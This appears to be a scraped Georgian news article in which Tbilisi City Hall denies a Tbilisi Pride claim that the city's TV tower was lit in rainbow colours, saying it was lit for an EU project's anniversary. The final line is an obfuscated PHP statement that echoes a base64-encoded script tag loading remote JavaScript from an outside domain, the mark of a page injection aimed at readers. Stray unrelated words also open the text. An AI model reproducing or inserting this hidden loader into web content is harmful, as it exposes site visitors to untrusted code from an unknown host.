celsiusi
ავერსი შნაიდერი

თბილისის მერია განცხადებას ავრცელებს, სადაც ნათქვამია, რომ „თბილისი პრაიდის“ მიერ გავრცელებული ინფორმაცია, თითქოს თბილისის ანძა დღეს ცისარტყელის ფერებში განათდა, არ შეესაბამება სინამდვილეს.

მერიის განმარტებით, თბილისის ანძა ევროკავშირის პროექტის – „მერების შეთანხმება – აღმოსავლეთ პარტნიორობა“ 10 წლის იუბილესთან დაკავშირებით, პროექტის ლოგოს ფერებში განათდა.

„გვინდა, გამოვეხმაუროთ სოციალურ ქსელ „ფეისბუქში“ „თბილისი პრაიდის“ მიერ გავრცელებულ ინფორმაციას, თითქოს თბილისის ანძა დღეს ცისარტყელის ფერებში აინთო. აღნიშნული ინფორმაცია არის სრული სიცრუე და არ შეესაბამება სინამდვილეს.

როგორც მოგეხსენებათ, ევროკავშირის პროექტი „მერების შეთანხმება – აღმოსავლეთ პარტნიორობა“ 10 წლისთავს აღნიშნავს. სწორედ საიუბილეო ღონისძიებების ფარგლებში, თბილისის ანძა განათდა პროექტის ლოგოს ფერებში (ყვითელი, სალათისფერი, მწვანე, ცისფერი, ლურჯი)“, – აღნიშნულია მერიის მიერ გავრცელებულ განცხადებაში.

ავტორი
მირანდა შურღაია
417
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");